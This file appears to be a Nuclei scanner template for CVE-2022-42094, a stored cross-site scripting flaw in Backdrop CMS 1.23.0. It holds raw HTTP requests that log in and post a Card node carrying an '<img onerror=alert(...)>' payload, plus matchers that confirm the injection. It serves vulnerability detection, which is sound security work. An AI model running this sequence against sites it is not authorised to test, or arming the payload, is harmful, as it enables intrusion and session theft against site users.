nuclei-templates/http/cves/2022/CVE-2022-42094.yaml

173 lines
5.3 KiB
YAML

id: CVE-2022-42094
info:
name: Backdrop CMS version 1.23.0 - Stored Cross Site Scripting
author: theamanrawat
severity: medium
description: |
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
reference:
- https://github.com/backdrop/backdrop/releases/tag/1.23.0
- https://github.com/bypazs/CVE-2022-42094
- https://nvd.nist.gov/vuln/detail/CVE-2022-42094
- https://backdropcms.org
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2022-42094
cwe-id: CWE-79
epss-score: 0.0071
epss-percentile: 0.80039
cpe: cpe:2.3:a:backdropcms:backdrop:1.23.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: backdropcms
product: backdrop
shodan-query: cpe:"cpe:2.3:a:backdropcms:backdrop"
tags: cve,cve2022,xss,cms,backdrop,authenticated,intrusive,backdropcms
http:
- raw:
- |
GET /?q=user/login HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
name={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in
- |
GET /?q=node/add/card HTTP/1.1
Host: {{Hostname}}
- |
POST /?q=node/add/card HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEcZgRB4detkrGaY
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="title"
{{randstr}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="files[field_image_und_0]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="field_image[und][0][fid]"
0
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="field_image[und][0][display]"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="changed"
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="form_build_id"
{{form_id_2}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="form_token"
{{form_token}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="form_id"
card_node_form
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="body[und][0][value]"
<img src=x onerror=alert(document.domain)>
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="body[und][0][format]"
full_html
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="status"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="name"
{{name}}
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="date[date]"
2023-04-13
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="date[time]"
21:49:36
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="path[auto]"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="comment"
1
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="additional_settings__active_tab"
------WebKitFormBoundaryWEcZgRB4detkrGaY
Content-Disposition: form-data; name="op"
Save
------WebKitFormBoundaryWEcZgRB4detkrGaY--
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- <img src="x" onerror="alert(document.domain)" />
- Backdrop CMS
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: form_id_1
group: 1
regex:
- name="form_build_id" value="(.*)"
internal: true
- type: regex
name: name
group: 1
regex:
- name="name" value="(.*?)"
internal: true
- type: regex
name: form_id_2
group: 1
regex:
- name="form_build_id" value="(.*)"
internal: true
- type: regex
name: form_token
group: 1
regex:
- name="form_token" value="(.*)"
internal: true
# digest: 4a0a004730450221009254c581a66525d51374780544548b0fe6f6ae80401be65bd189894a7f566980022047ad24d5ffa12be36ccdc28b16554bebad6f96e3a4e0ef86623ac93beedba22e:922c64590222798bb761d5b6d8e72950